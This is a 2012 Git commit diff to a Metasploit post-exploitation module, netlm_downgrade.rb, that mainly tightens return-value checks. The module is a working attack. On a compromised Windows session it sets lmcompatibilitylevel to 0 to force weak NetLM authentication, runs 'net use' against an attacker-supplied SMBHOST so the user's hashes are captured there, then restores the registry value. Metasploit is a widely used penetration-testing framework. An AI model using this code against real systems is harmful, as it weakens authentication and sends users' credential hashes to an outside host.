Make sure return vals are handled correctly.

sinn3r · sinn3r · commit 37524c7965d6 · 2012-12-19T09:45:01.000-06:00
diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb
@@ -1,7 +1,3 @@
-##
-# $Id: netlm_downgrade.rb
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -31,25 +27,32 @@ def initialize(info={})
 				NetLM hashes
 				},
 			'License'        => MSF_LICENSE,
-			'Author'         => [ 'Brandon McCann "zeknox" <bmccann [at] accuvant.com>', 'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'],
+			'Author'         =>
+				[
+					'Brandon McCann "zeknox" <bmccann [at] accuvant.com>',
+					'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'
+				],
 			'SessionTypes'   => [ 'meterpreter' ],
-			'References'     => [
-				[ 'URL', 'http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks']
-			]
+			'References'     =>
+				[
+					[ 'URL', 'http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks']
+				]
 		))
 
 		register_options(
 			[
-				OptAddress.new(   'SMBHOST',    [ true,  'IP Address where SMB host is listening to capture hashes.' ])
+				OptAddress.new('SMBHOST', [ true, 'IP Address where SMB host is listening to capture hashes.' ])
 			], self.class)
 	end
 
 	# method to make smb connection
 	def smb_connect
 		begin
 			print_status("Establishing SMB connection to " + datastore['SMBHOST'])
-			cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}")
-			print_status("The SMBHOST should now have NetLM hashes")
+			res = cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}")
+			if res =~ /The command completed successfully/
+				print_good("The SMBHOST should now have NetLM hashes")
+			end
 		rescue
 			print_error("Issues establishing SMB connection")
 		end
@@ -62,46 +65,50 @@ def run
 			# running as SYSTEM and will not pass any network credentials
 			print_error "Running as SYSTEM, should be run as valid USER"
 			return
+		end
+
+		subkey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\"
+		v_name = "lmcompatibilitylevel"
+		netlm = registry_getvaldata(subkey, v_name)
+		if netlm.nil?
+			print_error("Issues enumerating registry values")
+			return
+		end
+
+		if netlm == 0
+			print_status("NetLM is already enabled on this system")
+
+			# call smb_connect method to pass network hashes
+			smb_connect
 		else
-			subkey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\"
-			v_name = "lmcompatibilitylevel"
-			begin
-				netlm = registry_getvaldata(subkey, v_name)
-			rescue
+
+			print_status("NetLM is Disabled: #{subkey}#{v_name} == #{netlm.to_s}")
+			v = registry_setvaldata(subkey,v_name,0,"REG_DWORD")
+			if v.nil?
+				print_error("Issues modifying registry value")
+				return
+			end
+
+			post_netlm = registry_getvaldata(subkey, v_name)
+			if post_netlm.nil?
 				print_error("Issues enumerating registry values")
+				return
 			end
 
-			if netlm == 0
-				print_status("NetLM is already enabled on this system")
+			print_good("NetLM is Enabled:  #{subkey}#{v_name} == #{post_netlm.to_s}")
 
 				# call smb_connect method to pass network hashes
-				smb_connect
-			else
-				begin
-					print_status("NetLM is Disabled: #{subkey}#{v_name} == #{netlm.to_s}")
-					registry_setvaldata(subkey,v_name,0,"REG_DWORD")
-				rescue
-					print_error("Issues modifying registry value")
-				end
-
-				begin
-					post_netlm = registry_getvaldata(subkey, v_name)
-					print_good("NetLM is Enabled:  #{subkey}#{v_name} == #{post_netlm.to_s}")
-				rescue
-					print_error("Issues enumerating registry values")
-				end
+			smb_connect
 
-				# call smb_connect method to pass network hashes
-				smb_connect
-
-				# cleanup the registry
-				begin
-					registry_setvaldata(subkey,v_name,netlm,"REG_DWORD")
-					print_status("Cleanup Completed: #{subkey}#{v_name} == #{netlm.to_s}")
-				rescue
-					print_error("Issues cleaning up registry changes")
-				end
+			# cleanup the registry
+			v = registry_setvaldata(subkey,v_name,netlm,"REG_DWORD")
+			if v
+				print_status("Cleanup Completed: #{subkey}#{v_name} == #{netlm.to_s}")
+			else
+				print_error("Issues cleaning up registry changes")
+				return
 			end
+
 		end
 	end
 end
